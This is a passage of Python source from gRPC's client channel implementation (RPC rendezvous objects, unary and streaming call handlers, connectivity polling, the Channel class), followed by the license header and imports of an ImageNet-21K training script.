raise self
except grpc.RpcError:
return sys.exc_info()[2]
def add_done_callback(self, fn, timeout=None): # pylint: disable=unused-argument
"""See grpc.Future.add_done_callback."""
fn(self)
class _Rendezvous(grpc.RpcError, grpc.RpcContext):
"""An RPC iterator.
Attributes:
_state: An instance of _RPCState.
_call: An instance of SegregatedCall or IntegratedCall.
In either case, the _call object is expected to have operate, cancel,
and next_event methods.
_response_deserializer: A callable taking bytes and return a Python
object.
_deadline: A float representing the deadline of the RPC in seconds. Or
possibly None, to represent an RPC with no deadline at all.
"""
def __init__(self, state, call, response_deserializer, deadline):
super(_Rendezvous, self).__init__()
self._state = state
self._call = call
self._response_deserializer = response_deserializer
self._deadline = deadline
def is_active(self):
"""See grpc.RpcContext.is_active"""
with self._state.condition:
return self._state.code is None
def time_remaining(self):
"""See grpc.RpcContext.time_remaining"""
with self._state.condition:
if self._deadline is None:
return None
else:
return max(self._deadline - time.time(), 0)
def cancel(self):
"""See grpc.RpcContext.cancel"""
with self._state.condition:
if self._state.code is None:
code = grpc.StatusCode.CANCELLED
details = 'Locally cancelled by application!'
self._call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code], details)
self._state.cancelled = True
_abort(self._state, code, details)
self._state.condition.notify_all()
return True
else:
return False
def add_callback(self, callback):
"""See grpc.RpcContext.add_callback"""
with self._state.condition:
if self._state.callbacks is None:
return False
else:
self._state.callbacks.append(callback)
return True
def __iter__(self):
return self
def next(self):
return self._next()
def __next__(self):
return self._next()
def _next(self):
raise NotImplementedError()
def debug_error_string(self):
raise NotImplementedError()
def _repr(self):
return _rpc_state_string(self.__class__.__name__, self._state)
def __repr__(self):
return self._repr()
def __str__(self):
return self._repr()
def __del__(self):
with self._state.condition:
if self._state.code is None:
self._state.code = grpc.StatusCode.CANCELLED
self._state.details = 'Cancelled upon garbage collection!'
self._state.cancelled = True
self._call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[self._state.code],
self._state.details)
self._state.condition.notify_all()
class _SingleThreadedRendezvous(_Rendezvous, grpc.Call, grpc.Future): # pylint: disable=too-many-ancestors
"""An RPC iterator operating entirely on a single thread.
The __next__ method of _SingleThreadedRendezvous does not depend on the
existence of any other thread, including the "channel spin thread".
However, this means that its interface is entirely synchronous. So this
class cannot completely fulfill the grpc.Future interface. The result,
exception, and traceback methods will never block and will instead raise
an exception if calling the method would result in blocking.
This means that these methods are safe to call from add_done_callback
handlers.
"""
def _is_complete(self):
return self._state.code is not None
def cancelled(self):
with self._state.condition:
return self._state.cancelled
def running(self):
with self._state.condition:
return self._state.code is None
def done(self):
with self._state.condition:
return self._state.code is not None
def result(self, timeout=None):
"""Returns the result of the computation or raises its exception.
This method will never block. Instead, it will raise an exception
if calling this method would otherwise result in blocking.
Since this method will never block, any `timeout` argument passed will
be ignored.
"""
del timeout
with self._state.condition:
if not self._is_complete():
raise grpc.experimental.UsageError(
"_SingleThreadedRendezvous only supports result() when the RPC is complete."
)
if self._state.code is grpc.StatusCode.OK:
return self._state.response
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
raise self
def exception(self, timeout=None):
"""Return the exception raised by the computation.
This method will never block. Instead, it will raise an exception
if calling this method would otherwise result in blocking.
Since this method will never block, any `timeout` argument passed will
be ignored.
"""
del timeout
with self._state.condition:
if not self._is_complete():
raise grpc.experimental.UsageError(
"_SingleThreadedRendezvous only supports exception() when the RPC is complete."
)
if self._state.code is grpc.StatusCode.OK:
return None
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
return self
def traceback(self, timeout=None):
"""Access the traceback of the exception raised by the computation.
This method will never block. Instead, it will raise an exception
if calling this method would otherwise result in blocking.
Since this method will never block, any `timeout` argument passed will
be ignored.
"""
del timeout
with self._state.condition:
if not self._is_complete():
raise grpc.experimental.UsageError(
"_SingleThreadedRendezvous only supports traceback() when the RPC is complete."
)
if self._state.code is grpc.StatusCode.OK:
return None
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
try:
raise self
except grpc.RpcError:
return sys.exc_info()[2]
def add_done_callback(self, fn):
with self._state.condition:
if self._state.code is None:
self._state.callbacks.append(functools.partial(fn, self))
return
fn(self)
def initial_metadata(self):
"""See grpc.Call.initial_metadata"""
with self._state.condition:
# NOTE(gnossen): Based on our initial call batch, we are guaranteed
# to receive initial metadata before any messages.
while self._state.initial_metadata is None:
self._consume_next_event()
return self._state.initial_metadata
def trailing_metadata(self):
"""See grpc.Call.trailing_metadata"""
with self._state.condition:
if self._state.trailing_metadata is None:
raise grpc.experimental.UsageError(
"Cannot get trailing metadata until RPC is completed.")
return self._state.trailing_metadata
def code(self):
"""See grpc.Call.code"""
with self._state.condition:
if self._state.code is None:
raise grpc.experimental.UsageError(
"Cannot get code until RPC is completed.")
return self._state.code
def details(self):
"""See grpc.Call.details"""
with self._state.condition:
if self._state.details is None:
raise grpc.experimental.UsageError(
"Cannot get details until RPC is completed.")
return _common.decode(self._state.details)
def _consume_next_event(self):
event = self._call.next_event()
with self._state.condition:
callbacks = _handle_event(event, self._state,
self._response_deserializer)
for callback in callbacks:
# NOTE(gnossen): We intentionally allow exceptions to bubble up
# to the user when running on a single thread.
callback()
return event
def _next_response(self):
while True:
self._consume_next_event()
with self._state.condition:
if self._state.response is not None:
response = self._state.response
self._state.response = None
return response
elif cygrpc.OperationType.receive_message not in self._state.due:
if self._state.code is grpc.StatusCode.OK:
raise StopIteration()
elif self._state.code is not None:
raise self
def _next(self):
with self._state.condition:
if self._state.code is None:
operating = self._call.operate(
(cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),), None)
if operating:
self._state.due.add(cygrpc.OperationType.receive_message)
elif self._state.code is grpc.StatusCode.OK:
raise StopIteration()
else:
raise self
return self._next_response()
def debug_error_string(self):
with self._state.condition:
if self._state.debug_error_string is None:
raise grpc.experimental.UsageError(
"Cannot get debug error string until RPC is completed.")
return _common.decode(self._state.debug_error_string)
class _MultiThreadedRendezvous(_Rendezvous, grpc.Call, grpc.Future): # pylint: disable=too-many-ancestors
"""An RPC iterator that depends on a channel spin thread.
This iterator relies upon a per-channel thread running in the background,
dequeueing events from the completion queue, and notifying threads waiting
on the threading.Condition object in the _RPCState object.
This extra thread allows _MultiThreadedRendezvous to fulfill the grpc.Future interface
and to mediate a bidirection streaming RPC.
"""
def initial_metadata(self):
"""See grpc.Call.initial_metadata"""
with self._state.condition:
def _done():
return self._state.initial_metadata is not None
_common.wait(self._state.condition.wait, _done)
return self._state.initial_metadata
def trailing_metadata(self):
"""See grpc.Call.trailing_metadata"""
with self._state.condition:
def _done():
return self._state.trailing_metadata is not None
_common.wait(self._state.condition.wait, _done)
return self._state.trailing_metadata
def code(self):
"""See grpc.Call.code"""
with self._state.condition:
def _done():
return self._state.code is not None
_common.wait(self._state.condition.wait, _done)
return self._state.code
def details(self):
"""See grpc.Call.details"""
with self._state.condition:
def _done():
return self._state.details is not None
_common.wait(self._state.condition.wait, _done)
return _common.decode(self._state.details)
def debug_error_string(self):
with self._state.condition:
def _done():
return self._state.debug_error_string is not None
_common.wait(self._state.condition.wait, _done)
return _common.decode(self._state.debug_error_string)
def cancelled(self):
with self._state.condition:
return self._state.cancelled
def running(self):
with self._state.condition:
return self._state.code is None
def done(self):
with self._state.condition:
return self._state.code is not None
def _is_complete(self):
return self._state.code is not None
def result(self, timeout=None):
"""Returns the result of the computation or raises its exception.
See grpc.Future.result for the full API contract.
"""
with self._state.condition:
timed_out = _common.wait(self._state.condition.wait,
self._is_complete,
timeout=timeout)
if timed_out:
raise grpc.FutureTimeoutError()
else:
if self._state.code is grpc.StatusCode.OK:
return self._state.response
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
raise self
def exception(self, timeout=None):
"""Return the exception raised by the computation.
See grpc.Future.exception for the full API contract.
"""
with self._state.condition:
timed_out = _common.wait(self._state.condition.wait,
self._is_complete,
timeout=timeout)
if timed_out:
raise grpc.FutureTimeoutError()
else:
if self._state.code is grpc.StatusCode.OK:
return None
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
return self
def traceback(self, timeout=None):
"""Access the traceback of the exception raised by the computation.
See grpc.future.traceback for the full API contract.
"""
with self._state.condition:
timed_out = _common.wait(self._state.condition.wait,
self._is_complete,
timeout=timeout)
if timed_out:
raise grpc.FutureTimeoutError()
else:
if self._state.code is grpc.StatusCode.OK:
return None
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
try:
raise self
except grpc.RpcError:
return sys.exc_info()[2]
def add_done_callback(self, fn):
with self._state.condition:
if self._state.code is None:
self._state.callbacks.append(functools.partial(fn, self))
return
fn(self)
def _next(self):
with self._state.condition:
if self._state.code is None:
event_handler = _event_handler(self._state,
self._response_deserializer)
operating = self._call.operate(
(cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),),
event_handler)
if operating:
self._state.due.add(cygrpc.OperationType.receive_message)
elif self._state.code is grpc.StatusCode.OK:
raise StopIteration()
else:
raise self
def _response_ready():
return (self._state.response is not None or
(cygrpc.OperationType.receive_message
not in self._state.due and
self._state.code is not None))
_common.wait(self._state.condition.wait, _response_ready)
if self._state.response is not None:
response = self._state.response
self._state.response = None
return response
elif cygrpc.OperationType.receive_message not in self._state.due:
if self._state.code is grpc.StatusCode.OK:
raise StopIteration()
elif self._state.code is not None:
raise self
def _start_unary_request(request, timeout, request_serializer):
deadline = _deadline(timeout)
serialized_request = _common.serialize(request, request_serializer)
if serialized_request is None:
state = _RPCState((), (), (), grpc.StatusCode.INTERNAL,
'Exception serializing request!')
error = _InactiveRpcError(state)
return deadline, None, error
else:
return deadline, serialized_request, None
def _end_unary_response_blocking(state, call, with_call, deadline):
if state.code is grpc.StatusCode.OK:
if with_call:
rendezvous = _MultiThreadedRendezvous(state, call, None, deadline)
return state.response, rendezvous
else:
return state.response
else:
raise _InactiveRpcError(state)
def _stream_unary_invocation_operationses(metadata, initial_metadata_flags):
return (
(
cygrpc.SendInitialMetadataOperation(metadata,
initial_metadata_flags),
cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
def _stream_unary_invocation_operationses_and_tags(metadata,
initial_metadata_flags):
return tuple((
operations,
None,
) for operations in _stream_unary_invocation_operationses(
metadata, initial_metadata_flags))
def _determine_deadline(user_deadline):
parent_deadline = cygrpc.get_deadline_from_context()
if parent_deadline is None and user_deadline is None:
return None
elif parent_deadline is not None and user_deadline is None:
return parent_deadline
elif user_deadline is not None and parent_deadline is None:
return user_deadline
else:
return min(parent_deadline, user_deadline)
class _UnaryUnaryMultiCallable(grpc.UnaryUnaryMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def _prepare(self, request, timeout, metadata, wait_for_ready, compression):
deadline, serialized_request, rendezvous = _start_unary_request(
request, timeout, self._request_serializer)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
if serialized_request is None:
return None, None, None, rendezvous
else:
state = _RPCState(_UNARY_UNARY_INITIAL_DUE, None, None, None, None)
operations = (
cygrpc.SendInitialMetadataOperation(augmented_metadata,
initial_metadata_flags),
cygrpc.SendMessageOperation(serialized_request, _EMPTY_FLAGS),
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),
cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
)
return state, operations, deadline, None
def _blocking(self, request, timeout, metadata, credentials, wait_for_ready,
compression):
state, operations, deadline, rendezvous = self._prepare(
request, timeout, metadata, wait_for_ready, compression)
if state is None:
raise rendezvous # pylint: disable-msg=raising-bad-type
else:
call = self._channel.segregated_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
self._method, None, _determine_deadline(deadline), metadata,
None if credentials is None else credentials._credentials, ((
operations,
None,
),), self._context)
event = call.next_event()
_handle_event(event, state, self._response_deserializer)
return state, call
def __call__(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request, timeout, metadata, credentials,
wait_for_ready, compression)
return _end_unary_response_blocking(state, call, False, None)
def with_call(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request, timeout, metadata, credentials,
wait_for_ready, compression)
return _end_unary_response_blocking(state, call, True, None)
def future(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, operations, deadline, rendezvous = self._prepare(
request, timeout, metadata, wait_for_ready, compression)
if state is None:
raise rendezvous # pylint: disable-msg=raising-bad-type
else:
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
self._method, None, deadline, metadata,
None if credentials is None else credentials._credentials,
(operations,), event_handler, self._context)
return _MultiThreadedRendezvous(state, call,
self._response_deserializer,
deadline)
class _SingleThreadedUnaryStreamMultiCallable(grpc.UnaryStreamMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, method, request_serializer,
response_deserializer):
self._channel = channel
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def __call__( # pylint: disable=too-many-locals
self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
deadline = _deadline(timeout)
serialized_request = _common.serialize(request,
self._request_serializer)
if serialized_request is None:
state = _RPCState((), (), (), grpc.StatusCode.INTERNAL,
'Exception serializing request!')
raise _InactiveRpcError(state)
state = _RPCState(_UNARY_STREAM_INITIAL_DUE, None, None, None, None)
call_credentials = None if credentials is None else credentials._credentials
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
operations = (
(cygrpc.SendInitialMetadataOperation(augmented_metadata,
initial_metadata_flags),
cygrpc.SendMessageOperation(serialized_request, _EMPTY_FLAGS),
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS)),
(cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
operations_and_tags = tuple((ops, None) for ops in operations)
call = self._channel.segregated_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, _determine_deadline(deadline), metadata, call_credentials,
operations_and_tags, self._context)
return _SingleThreadedRendezvous(state, call,
self._response_deserializer, deadline)
class _UnaryStreamMultiCallable(grpc.UnaryStreamMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def __call__( # pylint: disable=too-many-locals
self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
deadline, serialized_request, rendezvous = _start_unary_request(
request, timeout, self._request_serializer)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
if serialized_request is None:
raise rendezvous # pylint: disable-msg=raising-bad-type
else:
augmented_metadata = _compression.augment_metadata(
metadata, compression)
state = _RPCState(_UNARY_STREAM_INITIAL_DUE, None, None, None, None)
operationses = (
(
cygrpc.SendInitialMetadataOperation(augmented_metadata,
initial_metadata_flags),
cygrpc.SendMessageOperation(serialized_request,
_EMPTY_FLAGS),
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
self._method, None, _determine_deadline(deadline), metadata,
None if credentials is None else credentials._credentials,
operationses, _event_handler(state,
self._response_deserializer),
self._context)
return _MultiThreadedRendezvous(state, call,
self._response_deserializer,
deadline)
class _StreamUnaryMultiCallable(grpc.StreamUnaryMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def _blocking(self, request_iterator, timeout, metadata, credentials,
wait_for_ready, compression):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
call = self._channel.segregated_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, _determine_deadline(deadline), augmented_metadata,
None if credentials is None else credentials._credentials,
_stream_unary_invocation_operationses_and_tags(
augmented_metadata, initial_metadata_flags), self._context)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, None)
while True:
event = call.next_event()
with state.condition:
_handle_event(event, state, self._response_deserializer)
state.condition.notify_all()
if not state.due:
break
return state, call
def __call__(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request_iterator, timeout, metadata,
credentials, wait_for_ready, compression)
return _end_unary_response_blocking(state, call, False, None)
def with_call(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request_iterator, timeout, metadata,
credentials, wait_for_ready, compression)
return _end_unary_response_blocking(state, call, True, None)
def future(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
event_handler = _event_handler(state, self._response_deserializer)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, deadline, augmented_metadata,
None if credentials is None else credentials._credentials,
_stream_unary_invocation_operationses(metadata,
initial_metadata_flags),
event_handler, self._context)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, event_handler)
return _MultiThreadedRendezvous(state, call,
self._response_deserializer, deadline)
class _StreamStreamMultiCallable(grpc.StreamStreamMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def __call__(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_STREAM_INITIAL_DUE, None, None, None, None)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
operationses = (
(
cygrpc.SendInitialMetadataOperation(augmented_metadata,
initial_metadata_flags),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, _determine_deadline(deadline), augmented_metadata,
None if credentials is None else credentials._credentials,
operationses, event_handler, self._context)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, event_handler)
return _MultiThreadedRendezvous(state, call,
self._response_deserializer, deadline)
class _InitialMetadataFlags(int):
"""Stores immutable initial metadata flags"""
def __new__(cls, value=_EMPTY_FLAGS):
value &= cygrpc.InitialMetadataFlags.used_mask
return super(_InitialMetadataFlags, cls).__new__(cls, value)
def with_wait_for_ready(self, wait_for_ready):
if wait_for_ready is not None:
if wait_for_ready:
return self.__class__(self | cygrpc.InitialMetadataFlags.wait_for_ready | \
cygrpc.InitialMetadataFlags.wait_for_ready_explicitly_set)
elif not wait_for_ready:
return self.__class__(self & ~cygrpc.InitialMetadataFlags.wait_for_ready | \
cygrpc.InitialMetadataFlags.wait_for_ready_explicitly_set)
return self
class _ChannelCallState(object):
def __init__(self, channel):
self.lock = threading.Lock()
self.channel = channel
self.managed_calls = 0
self.threading = False
def reset_postfork_child(self):
self.managed_calls = 0
def __del__(self):
try:
self.channel.close(cygrpc.StatusCode.cancelled,
'Channel deallocated!')
except (TypeError, AttributeError):
pass
def _run_channel_spin_thread(state):
def channel_spin():
while True:
cygrpc.block_if_fork_in_progress(state)
event = state.channel.next_call_event()
if event.completion_type == cygrpc.CompletionType.queue_timeout:
continue
call_completed = event.tag(event)
if call_completed:
with state.lock:
state.managed_calls -= 1
if state.managed_calls == 0:
return
channel_spin_thread = cygrpc.ForkManagedThread(target=channel_spin)
channel_spin_thread.setDaemon(True)
channel_spin_thread.start()
def _channel_managed_call_management(state):
# pylint: disable=too-many-arguments
def create(flags, method, host, deadline, metadata, credentials,
operationses, event_handler, context):
"""Creates a cygrpc.IntegratedCall.
Args:
flags: An integer bitfield of call flags.
method: The RPC method.
host: A host string for the created call.
deadline: A float to be the deadline of the created call or None if
the call is to have an infinite deadline.
metadata: The metadata for the call or None.
credentials: A cygrpc.CallCredentials or None.
operationses: An iterable of iterables of cygrpc.Operations to be
started on the call.
event_handler: A behavior to call to handle the events resultant from
the operations on the call.
context: Context object for distributed tracing.
Returns:
A cygrpc.IntegratedCall with which to conduct an RPC.
"""
operationses_and_tags = tuple((
operations,
event_handler,
) for operations in operationses)
with state.lock:
call = state.channel.integrated_call(flags, method, host, deadline,
metadata, credentials,
operationses_and_tags, context)
if state.managed_calls == 0:
state.managed_calls = 1
_run_channel_spin_thread(state)
else:
state.managed_calls += 1
return call
return create
class _ChannelConnectivityState(object):
def __init__(self, channel):
self.lock = threading.RLock()
self.channel = channel
self.polling = False
self.connectivity = None
self.try_to_connect = False
self.callbacks_and_connectivities = []
self.delivering = False
def reset_postfork_child(self):
self.polling = False
self.connectivity = None
self.try_to_connect = False
self.callbacks_and_connectivities = []
self.delivering = False
def _deliveries(state):
callbacks_needing_update = []
for callback_and_connectivity in state.callbacks_and_connectivities:
callback, callback_connectivity, = callback_and_connectivity
if callback_connectivity is not state.connectivity:
callbacks_needing_update.append(callback)
callback_and_connectivity[1] = state.connectivity
return callbacks_needing_update
def _deliver(state, initial_connectivity, initial_callbacks):
connectivity = initial_connectivity
callbacks = initial_callbacks
while True:
for callback in callbacks:
cygrpc.block_if_fork_in_progress(state)
try:
callback(connectivity)
except Exception: # pylint: disable=broad-except
_LOGGER.exception(
_CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE)
with state.lock:
callbacks = _deliveries(state)
if callbacks:
connectivity = state.connectivity
else:
state.delivering = False
return
def _spawn_delivery(state, callbacks):
delivering_thread = cygrpc.ForkManagedThread(target=_deliver,
args=(
state,
state.connectivity,
callbacks,
))
delivering_thread.setDaemon(True)
delivering_thread.start()
state.delivering = True
# NOTE(https://github.com/grpc/grpc/issues/3064): We'd rather not poll.
def _poll_connectivity(state, channel, initial_try_to_connect):
try_to_connect = initial_try_to_connect
connectivity = channel.check_connectivity_state(try_to_connect)
with state.lock:
state.connectivity = (
_common.
CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[connectivity])
callbacks = tuple(
callback for callback, unused_but_known_to_be_none_connectivity in
state.callbacks_and_connectivities)
for callback_and_connectivity in state.callbacks_and_connectivities:
callback_and_connectivity[1] = state.connectivity
if callbacks:
_spawn_delivery(state, callbacks)
while True:
event = channel.watch_connectivity_state(connectivity,
time.time() + 0.2)
cygrpc.block_if_fork_in_progress(state)
with state.lock:
if not state.callbacks_and_connectivities and not state.try_to_connect:
state.polling = False
state.connectivity = None
break
try_to_connect = state.try_to_connect
state.try_to_connect = False
if event.success or try_to_connect:
connectivity = channel.check_connectivity_state(try_to_connect)
with state.lock:
state.connectivity = (
_common.CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[
connectivity])
if not state.delivering:
callbacks = _deliveries(state)
if callbacks:
_spawn_delivery(state, callbacks)
def _subscribe(state, callback, try_to_connect):
with state.lock:
if not state.callbacks_and_connectivities and not state.polling:
polling_thread = cygrpc.ForkManagedThread(
target=_poll_connectivity,
args=(state, state.channel, bool(try_to_connect)))
polling_thread.setDaemon(True)
polling_thread.start()
state.polling = True
state.callbacks_and_connectivities.append([callback, None])
elif not state.delivering and state.connectivity is not None:
_spawn_delivery(state, (callback,))
state.try_to_connect |= bool(try_to_connect)
state.callbacks_and_connectivities.append(
[callback, state.connectivity])
else:
state.try_to_connect |= bool(try_to_connect)
state.callbacks_and_connectivities.append([callback, None])
def _unsubscribe(state, callback):
with state.lock:
for index, (subscribed_callback, unused_connectivity) in enumerate(
state.callbacks_and_connectivities):
if callback == subscribed_callback:
state.callbacks_and_connectivities.pop(index)
break
def _augment_options(base_options, compression):
compression_option = _compression.create_channel_option(compression)
return tuple(base_options) + compression_option + ((
cygrpc.ChannelArgKey.primary_user_agent_string,
_USER_AGENT,
),)
def _separate_channel_options(options):
"""Separates core channel options from Python channel options."""
core_options = []
python_options = []
for pair in options:
if pair[0] == grpc.experimental.ChannelOptions.SingleThreadedUnaryStream:
python_options.append(pair)
else:
core_options.append(pair)
return python_options, core_options
class Channel(grpc.Channel):
"""A cygrpc.Channel-backed implementation of grpc.Channel."""
def __init__(self, target, options, credentials, compression):
"""Constructor.
Args:
target: The target to which to connect.
options: Configuration options for the channel.
credentials: A cygrpc.ChannelCredentials or None.
compression: An optional value indicating the compression method to be
used over the lifetime of the channel.
"""
python_options, core_options = _separate_channel_options(options)
self._single_threaded_unary_stream = _DEFAULT_SINGLE_THREADED_UNARY_STREAM
self._process_python_options(python_options)
self._channel = cygrpc.Channel(
_common.encode(target), _augment_options(core_options, compression),
credentials)
self._call_state = _ChannelCallState(self._channel)
self._connectivity_state = _ChannelConnectivityState(self._channel)
cygrpc.fork_register_channel(self)
def _process_python_options(self, python_options):
"""Sets channel attributes according to python-only channel options."""
for pair in python_options:
if pair[0] == grpc.experimental.ChannelOptions.SingleThreadedUnaryStream:
self._single_threaded_unary_stream = True
def subscribe(self, callback, try_to_connect=None):
_subscribe(self._connectivity_state, callback, try_to_connect)
def unsubscribe(self, callback):
_unsubscribe(self._connectivity_state, callback)
def unary_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return _UnaryUnaryMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def unary_stream(self,
method,
request_serializer=None,
response_deserializer=None):
# NOTE(rbellevi): Benchmarks have shown that running a unary-stream RPC
# on a single Python thread results in an appreciable speed-up. However,
# due to slight differences in capability, the multi-threaded variant
# remains the default.
if self._single_threaded_unary_stream:
return _SingleThreadedUnaryStreamMultiCallable(
self._channel, _common.encode(method), request_serializer,
response_deserializer)
else:
return _UnaryStreamMultiCallable(
self._channel,
_channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer,
response_deserializer)
def stream_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return _StreamUnaryMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def stream_stream(self,
method,
request_serializer=None,
response_deserializer=None):
return _StreamStreamMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def _unsubscribe_all(self):
state = self._connectivity_state
if state:
with state.lock:
del state.callbacks_and_connectivities[:]
def _close(self):
self._unsubscribe_all()
self._channel.close(cygrpc.StatusCode.cancelled, 'Channel closed!')
cygrpc.fork_unregister_channel(self)
def _close_on_fork(self):
self._unsubscribe_all()
self._channel.close_on_fork(cygrpc.StatusCode.cancelled,
'Channel closed due to fork')
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._close()
return False
def close(self):
self._close()
def __del__(self):
# TODO(https://github.com/grpc/grpc/issues/12531): Several releases
# after 1.12 (1.16 or thereabouts?) add a "self._channel.close" call
# here (or more likely, call self._close() here). We don't do this today
# because many valid use cases today allow the channel to be deleted
# immediately after stubs are created. After a sufficient period of time
# has passed for all users to be trusted to hang out to their channels
# for as long as they are in use and to close them after using them,
# then deletion of this grpc._channel.Channel instance can be made to
# effect closure of the underlying cygrpc.Channel instance.
try:
self._unsubscribe_all()
except: # pylint: disable=bare-except
# Exceptions in __del__ are ignored by Python anyway, but they can
# keep spamming logs. Just silence them.
pass
|
train_single_label_dist_imagenet1k.py | # --------------------------------------------------------
# ImageNet-21K Pretraining for The Masses
# Copyright 2021 Alibaba MIIL (c)
# Licensed under MIT License [see LICENSE file for details]
# Written by Tal Ridnik
# --------------------------------------------------------
import argparse
import time
import torch
import torch.nn.parallel
import torch.optim
import torch.utils.data.distributed
from torch.optim import lr_scheduler
import torch.multiprocessing as mp
from src_files.data_loading.data_loader import create_data_loaders
from src_files.helper_functions.distributed import print_at_master, setup_distrib, reduce_tensor, num_distrib, is_master
from src_files.helper_functions.general_helper_functions import accuracy, silence_PIL_warnings
from src_files.models import create_model
from src_files.loss_functions.losses import CrossEntropyLS
from torch.cuda.amp import GradScaler, autocast
from src_files.optimizers.create_optimizer import create_optimizer
